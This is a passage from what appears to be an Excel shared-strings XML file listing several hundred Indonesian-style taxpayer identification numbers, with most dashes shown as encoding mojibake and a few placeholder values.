    <t>31.523.512.7‚Äì418.000</t>
  </si>
  <si>
    <t>02.932.684.0‚Äì042.000</t>
  </si>
  <si>
    <t>02.830.805.4‚Äì412.000</t>
  </si>
  <si>
    <t>12.323.222.1‚Äì233.312</t>
  </si>
  <si>
    <t>01.344.492.2‚Äì041.000</t>
  </si>
  <si>
    <t>07‚Äì651‚Äì025‚Äì4‚Äì330‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì721‚Äì208‚Äì5‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì344‚Äì066‚Äì1‚Äì013‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì186‚Äì590‚Äì0‚Äì063‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì665‚Äì828‚Äì8‚Äì441‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì300‚Äì156‚Äì5‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì363‚Äì271‚Äì6‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì079‚Äì451‚Äì8‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì291‚Äì488‚Äì7‚Äì413‚Äì000</t>
  </si>
  <si>
    <t>01.000.065.1-941.003</t>
  </si>
  <si>
    <t>02‚Äì798‚Äì006‚Äì9‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì916‚Äì002‚Äì5‚Äì705‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì456‚Äì655‚Äì8‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì747‚Äì289‚Äì3‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì408‚Äì811‚Äì4‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì281‚Äì047‚Äì5‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì040‚Äì411‚Äì5‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì068‚Äì377‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì381‚Äì224‚Äì0‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì571‚Äì740‚Äì8‚Äì627‚Äì001</t>
  </si>
  <si>
    <t>31‚Äì533‚Äì808‚Äì7‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì914‚Äì336‚Äì4‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì316‚Äì558‚Äì1‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì535‚Äì044‚Äì8‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì524‚Äì042‚Äì6‚Äì428‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì115‚Äì963‚Äì7‚Äì056‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì270‚Äì012‚Äì4‚Äì043‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì384‚Äì452‚Äì5‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì535‚Äì215‚Äì6‚Äì648‚Äì001</t>
  </si>
  <si>
    <t>12‚Äì345‚Äì678‚Äì9‚Äì123‚Äì456</t>
  </si>
  <si>
    <t>31‚Äì315‚Äì908‚Äì9‚Äì043‚Äì000</t>
  </si>
  <si>
    <t>12‚Äì345‚Äì678‚Äì9‚Äì876‚Äì543</t>
  </si>
  <si>
    <t>03‚Äì040‚Äì253‚Äì1‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì696‚Äì710‚Äì9‚Äì045‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì280‚Äì855‚Äì4‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì319‚Äì044‚Äì8‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì235‚Äì709‚Äì1‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì082‚Äì928‚Äì1‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì496‚Äì911‚Äì7‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì612‚Äì793‚Äì2‚Äì501‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì509‚Äì719‚Äì6‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì206‚Äì641‚Äì9‚Äì645‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì069‚Äì501‚Äì3‚Äì624‚Äì002</t>
  </si>
  <si>
    <t>72.999.441.8‚Äì112.001</t>
  </si>
  <si>
    <t>01‚Äì310‚Äì957‚Äì5‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì442‚Äì671‚Äì0‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì294‚Äì754‚Äì2‚Äì435‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì698‚Äì727‚Äì3‚Äì437‚Äì000</t>
  </si>
  <si>
    <t>22‚Äì222‚Äì222‚Äì2‚Äì222‚Äì222</t>
  </si>
  <si>
    <t>02‚Äì871‚Äì594‚Äì4‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>12‚Äì312‚Äì312‚Äì3‚Äì111‚Äì113</t>
  </si>
  <si>
    <t>33‚Äì333‚Äì333‚Äì3‚Äì333‚Äì333</t>
  </si>
  <si>
    <t>70.829.728.8‚Äì124.000</t>
  </si>
  <si>
    <t>09.705.477.9‚Äì122.000</t>
  </si>
  <si>
    <t>21‚Äì100‚Äì626‚Äì7‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì345‚Äì646‚Äì5‚Äì465‚Äì487</t>
  </si>
  <si>
    <t>02‚Äì437‚Äì371‚Äì4‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì932‚Äì771‚Äì5‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì301‚Äì342‚Äì4‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì201‚Äì605‚Äì7‚Äì611‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì523‚Äì180‚Äì3‚Äì452‚Äì001</t>
  </si>
  <si>
    <t>83‚Äì043‚Äì706‚Äì7‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì183‚Äì349‚Äì5‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>89‚Äì725‚Äì394‚Äì4‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì051‚Äì403‚Äì0‚Äì823‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì345‚Äì593‚Äì8‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì101‚Äì374‚Äì3‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì001‚Äì887‚Äì7‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì734‚Äì358‚Äì1‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì356‚Äì737‚Äì3‚Äì431‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì978‚Äì582‚Äì1‚Äì451‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì071‚Äì146‚Äì3‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì311‚Äì525‚Äì4‚Äì011‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì221‚Äì118‚Äì7‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì009‚Äì822‚Äì4‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>08‚Äì328‚Äì638‚Äì5‚Äì722‚Äì002</t>
  </si>
  <si>
    <t>01‚Äì409‚Äì482‚Äì5‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì167‚Äì456‚Äì7‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì182‚Äì688‚Äì7‚Äì543‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì898‚Äì253‚Äì8‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì716‚Äì297‚Äì5‚Äì631‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì771‚Äì763‚Äì8‚Äì092‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì821‚Äì663‚Äì0‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì605‚Äì634‚Äì2‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì147‚Äì895‚Äì4‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>01.964.740.3‚Äì725‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì792‚Äì952‚Äì2‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì011‚Äì039‚Äì1‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì559‚Äì843‚Äì8‚Äì501‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì015‚Äì699‚Äì3‚Äì402‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì293‚Äì607‚Äì4‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì343‚Äì700‚Äì9‚Äì073‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì174‚Äì375‚Äì1‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>57‚Äì288‚Äì671‚Äì1‚Äì542‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì461‚Äì369‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>01.871.142.4-013.000</t>
  </si>
  <si>
    <t>01‚Äì141‚Äì082‚Äì6‚Äì627‚Äì001</t>
  </si>
  <si>
    <t>31.715.217.1-823.000</t>
  </si>
  <si>
    <t>81‚Äì073‚Äì670‚Äì2‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì643‚Äì974‚Äì5‚Äì403‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì092‚Äì570‚Äì5‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì695‚Äì189‚Äì6‚Äì125‚Äì000</t>
  </si>
  <si>
    <t>36‚Äì089‚Äì540‚Äì3‚Äì543‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì573‚Äì166‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì046‚Äì339‚Äì2‚Äì603‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì371‚Äì518‚Äì0‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì451‚Äì918‚Äì9‚Äì543‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì737‚Äì731‚Äì1‚Äì542‚Äì000</t>
  </si>
  <si>
    <t>35‚Äì074‚Äì691‚Äì3‚Äì543‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì557‚Äì371‚Äì8‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì404‚Äì980‚Äì3‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì267‚Äì977‚Äì3‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì256‚Äì989‚Äì1‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì453‚Äì932‚Äì1‚Äì648‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì572‚Äì188‚Äì7‚Äì305‚Äì001</t>
  </si>
  <si>
    <t>03‚Äì206‚Äì885‚Äì0‚Äì305‚Äì000</t>
  </si>
  <si>
    <t>47‚Äì743‚Äì031‚Äì2‚Äì726‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì751‚Äì547‚Äì0‚Äì726‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì169‚Äì343‚Äì1‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>68‚Äì237‚Äì392‚Äì3‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì505‚Äì573‚Äì2‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì883‚Äì593‚Äì9‚Äì543‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì369‚Äì253‚Äì1‚Äì413‚Äì000</t>
  </si>
  <si>
    <t>31.700.088.3-721.000</t>
  </si>
  <si>
    <t>88‚Äì090‚Äì171‚Äì5‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>57‚Äì487‚Äì727‚Äì0‚Äì808‚Äì000</t>
  </si>
  <si>
    <t>01.876.267.4-801.000</t>
  </si>
  <si>
    <t>82‚Äì127‚Äì307‚Äì5‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì039‚Äì424‚Äì0‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>31‚Äì523‚Äì522‚Äì6‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì664‚Äì605‚Äì2‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>89‚Äì153‚Äì150‚Äì1‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì061‚Äì076‚Äì4‚Äì093‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì061‚Äì864‚Äì1‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì923‚Äì651‚Äì2‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì303‚Äì971‚Äì2‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì165‚Äì638‚Äì4‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì131‚Äì282‚Äì0‚Äì215‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì092‚Äì571‚Äì5‚Äì305‚Äì000</t>
  </si>
  <si>
    <t>03.264.419.7-823.000</t>
  </si>
  <si>
    <t>02‚Äì919‚Äì715‚Äì9‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì232‚Äì219‚Äì4‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì248‚Äì681‚Äì8‚Äì612‚Äì000</t>
  </si>
  <si>
    <t>01.891.866.4-041.000</t>
  </si>
  <si>
    <t>01‚Äì000‚Äì497‚Äì6‚Äì051‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì827‚Äì625‚Äì5‚Äì645‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì346‚Äì766‚Äì3‚Äì604‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì511‚Äì652‚Äì8‚Äì951‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì490‚Äì284‚Äì3‚Äì304‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì516‚Äì963‚Äì7‚Äì722‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì854‚Äì698‚Äì0‚Äì033‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì774‚Äì009‚Äì2‚Äì722‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì220‚Äì042‚Äì2‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì690‚Äì662‚Äì3‚Äì722‚Äì001</t>
  </si>
  <si>
    <t>03‚Äì076‚Äì370‚Äì0‚Äì824‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì039‚Äì113‚Äì2‚Äì046‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì093‚Äì809‚Äì6‚Äì031‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì405‚Äì094‚Äì2‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì070‚Äì707‚Äì3‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì528‚Äì606‚Äì3‚Äì112‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì278‚Äì034‚Äì8‚Äì063‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì192‚Äì915‚Äì3‚Äì511‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì957‚Äì626‚Äì3‚Äì059‚Äì000</t>
  </si>
  <si>
    <t>64‚Äì254‚Äì932‚Äì3‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>15.643.236.5.726-000</t>
  </si>
  <si>
    <t>82.897.815.5-823.001</t>
  </si>
  <si>
    <t>07‚Äì508‚Äì310‚Äì5‚Äì214‚Äì000</t>
  </si>
  <si>
    <t>25.337.169.4-047.000</t>
  </si>
  <si>
    <t>82‚Äì647‚Äì314‚Äì2‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì189‚Äì244‚Äì3‚Äì037‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì830‚Äì004‚Äì6‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì095‚Äì681‚Äì7‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì389‚Äì928‚Äì9‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì557‚Äì197‚Äì9‚Äì026‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì914‚Äì371‚Äì6‚Äì043‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì462‚Äì917‚Äì1‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì136‚Äì639‚Äì8‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì941‚Äì737‚Äì7‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì517‚Äì118‚Äì4‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì233‚Äì310‚Äì0‚Äì723‚Äì001</t>
  </si>
  <si>
    <t>74‚Äì129‚Äì957‚Äì2‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì494‚Äì150‚Äì4‚Äì725‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì821‚Äì663‚Äì0‚Äì723‚Äì001</t>
  </si>
  <si>
    <t>31‚Äì510‚Äì961‚Äì1‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì494‚Äì928‚Äì0‚Äì063‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì172‚Äì041‚Äì2‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>66‚Äì326‚Äì242‚Äì6‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì062‚Äì143‚Äì1‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>16‚Äì357‚Äì978‚Äì2‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì135‚Äì974‚Äì6‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì932‚Äì679‚Äì0‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì178‚Äì017‚Äì1‚Äì822‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì026‚Äì500‚Äì5‚Äì057‚Äì000</t>
  </si>
  <si>
    <t>64‚Äì004‚Äì587‚Äì8‚Äì542‚Äì000</t>
  </si>
  <si>
    <t>02.119.988.0‚Äì832.000</t>
  </si>
  <si>
    <t>01.517.118.4‚Äì832.001</t>
  </si>
  <si>
    <t>01‚Äì920‚Äì207‚Äì6‚Äì003‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì097‚Äì609‚Äì6‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì788‚Äì773‚Äì8‚Äì821‚Äì000</t>
  </si>
  <si>
    <t>02.643.373.0-804.000</t>
  </si>
  <si>
    <t>82‚Äì591‚Äì197‚Äì7‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì167‚Äì505‚Äì1‚Äì721‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì316‚Äì833‚Äì4‚Äì722‚Äì000</t>
  </si>
  <si>
    <t>59.840.322.8-612.000</t>
  </si>
  <si>
    <t>70‚Äì940‚Äì277‚Äì0‚Äì605‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì203‚Äì483‚Äì4‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì074‚Äì603‚Äì2‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì183‚Äì113‚Äì4‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì457‚Äì680‚Äì7‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì101‚Äì950‚Äì4‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì136‚Äì808‚Äì7‚Äì047‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì107‚Äì015‚Äì0‚Äì429‚Äì000</t>
  </si>
  <si>
    <t>46‚Äì807‚Äì320‚Äì2‚Äì728‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì517‚Äì118‚Äì4‚Äì608‚Äì001</t>
  </si>
  <si>
    <t>70‚Äì151‚Äì131‚Äì3‚Äì085‚Äì000</t>
  </si>
  <si>
    <t>07‚Äì118‚Äì167‚Äì1‚Äì113‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì934‚Äì456‚Äì1‚Äì614‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì539‚Äì633‚Äì6‚Äì811‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì932‚Äì738‚Äì4‚Äì042‚Äì000</t>
  </si>
  <si>
    <t>21‚Äì139‚Äì275‚Äì8‚Äì405‚Äì000</t>
  </si>
  <si>
    <t>73‚Äì916‚Äì664‚Äì3‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>02.051.403.0‚Äì812.000</t>
  </si>
  <si>
    <t>01‚Äì327‚Äì446‚Äì9‚Äì009‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì452‚Äì876‚Äì2‚Äì823‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì278‚Äì845‚Äì2‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì454‚Äì019‚Äì9‚Äì631‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì772‚Äì982‚Äì7‚Äì645‚Äì000</t>
  </si>
  <si>
    <t>75‚Äì900‚Äì117‚Äì5‚Äì645‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì438‚Äì617‚Äì1‚Äì641‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì064‚Äì707‚Äì7‚Äì411‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì438‚Äì633‚Äì8‚Äì627‚Äì001</t>
  </si>
  <si>
    <t>02‚Äì541‚Äì715‚Äì5‚Äì432‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì276‚Äì479‚Äì3‚Äì414‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì020‚Äì289‚Äì6‚Äì908‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì112‚Äì532‚Äì5‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì963‚Äì533‚Äì1‚Äì086‚Äì000</t>
  </si>
  <si>
    <t>06‚Äì911‚Äì745‚Äì5‚Äì627‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì446‚Äì766‚Äì6‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>02.079.603.3‚Äì903.000</t>
  </si>
  <si>
    <t>01‚Äì871‚Äì297‚Äì6‚Äì507‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì896‚Äì243‚Äì1‚Äì503‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì125‚Äì517‚Äì1‚Äì812‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì409‚Äì167‚Äì0‚Äì809‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì444‚Äì907‚Äì5‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì454‚Äì019‚Äì9‚Äì801‚Äì001</t>
  </si>
  <si>
    <t>83‚Äì020‚Äì406‚Äì1‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì634‚Äì394‚Äì6‚Äì026‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì024‚Äì467‚Äì3‚Äì657‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì967‚Äì847‚Äì1‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì110‚Äì030‚Äì2‚Äì627‚Äì001</t>
  </si>
  <si>
    <t>03‚Äì184‚Äì631‚Äì4‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì719‚Äì423‚Äì1‚Äì617‚Äì001</t>
  </si>
  <si>
    <t>71‚Äì516‚Äì963‚Äì7‚Äì723‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì690‚Äì959‚Äì3‚Äì722‚Äì000</t>
  </si>
  <si>
    <t>09‚Äì694‚Äì725‚Äì4‚Äì722‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì058‚Äì048‚Äì3‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì097‚Äì027‚Äì9‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì028‚Äì435‚Äì9‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì572‚Äì938‚Äì4‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>81‚Äì737‚Äì297‚Äì2‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì741‚Äì520‚Äì7‚Äì250‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì497‚Äì580‚Äì9‚Äì625‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì083‚Äì284‚Äì8‚Äì651‚Äì000</t>
  </si>
  <si>
    <t>84.341.412.9.807.000</t>
  </si>
  <si>
    <t>14‚Äì582‚Äì871‚Äì1‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì693‚Äì678‚Äì0‚Äì618‚Äì000</t>
  </si>
  <si>
    <t>82‚Äì953‚Äì066‚Äì6‚Äì034‚Äì000</t>
  </si>
  <si>
    <t>31‚Äì422‚Äì336‚Äì3‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì871‚Äì438‚Äì6‚Äì033‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì472‚Äì462‚Äì0‚Äì418‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì258‚Äì436‚Äì7‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì768‚Äì295‚Äì6‚Äì903‚Äì001</t>
  </si>
  <si>
    <t>01‚Äì799‚Äì709‚Äì9‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì873‚Äì051‚Äì5‚Äì901‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì112‚Äì534‚Äì1‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì303‚Äì923‚Äì3‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì071‚Äì640‚Äì5‚Äì058‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì771‚Äì801‚Äì4‚Äì028‚Äì000</t>
  </si>
  <si>
    <t>34‚Äì330‚Äì478‚Äì8‚Äì121‚Äì000</t>
  </si>
  <si>
    <t>89‚Äì948‚Äì982‚Äì7‚Äì571‚Äì000</t>
  </si>
  <si>
    <t>14‚Äì454‚Äì241‚Äì2‚Äì224‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì280‚Äì423‚Äì9‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>74‚Äì610‚Äì661‚Äì6‚Äì801‚Äì000</t>
  </si>
  <si>
    <t>84‚Äì146‚Äì355‚Äì7‚Äì619‚Äì000</t>
  </si>
  <si>
    <t>08‚Äì320‚Äì718‚Äì3‚Äì701‚Äì000</t>
  </si>
  <si>
    <t>03.197.358.9-821.000</t>
  </si>
  <si>
    <t>02‚Äì881‚Äì392‚Äì1‚Äì036‚Äì000</t>
  </si>
  <si>
    <t>72‚Äì971‚Äì828‚Äì8‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>71‚Äì605‚Äì591‚Äì8‚Äì805‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì872‚Äì915‚Äì2‚Äì904‚Äì000</t>
  </si>
  <si>
    <t>76‚Äì937‚Äì341‚Äì6‚Äì643‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì280‚Äì992‚Äì3‚Äì041‚Äì000</t>
  </si>
  <si>
    <t>83‚Äì626‚Äì470‚Äì5‚Äì402‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì041‚Äì329‚Äì0‚Äì811‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì225‚Äì202‚Äì9‚Äì123‚Äì000</t>
  </si>
  <si>
    <t>26‚Äì368‚Äì150‚Äì4‚Äì115‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì444‚Äì268‚Äì3‚Äì113‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì018‚Äì240‚Äì4‚Äì941‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì087‚Äì675‚Äì8‚Äì724‚Äì000</t>
  </si>
  <si>
    <t>70‚Äì194‚Äì103‚Äì1‚Äì724‚Äì000</t>
  </si>
  <si>
    <t>02‚Äì638‚Äì777‚Äì9‚Äì507‚Äì000</t>
  </si>
  <si>
    <t>08‚Äì632‚Äì217‚Äì9‚Äì609‚Äì000</t>
  </si>
  <si>
    <t>03‚Äì255‚Äì900‚Äì7‚Äì101‚Äì000</t>
  </si>
  <si>
    <t>80‚Äì939‚Äì907‚Äì4‚Äì122‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì872‚Äì047‚Äì4‚Äì112‚Äì001</t>
  </si>
  <si>
    <t>83‚Äì136‚Äì812‚Äì1‚Äì513‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì661‚Äì341‚Äì6‚Äì326‚Äì000</t>
  </si>
  <si>
    <t xml:space="preserve">  01.661.341.6-326.000</t>
  </si>
  <si>
    <t>83‚Äì045‚Äì255‚Äì3‚Äì325‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì715‚Äì011‚Äì1‚Äì804‚Äì000</t>
  </si>
  <si>
    <t>01‚Äì880‚Äì279‚Äì3‚Äì112‚Äì000</t>
  </si>
  <si>
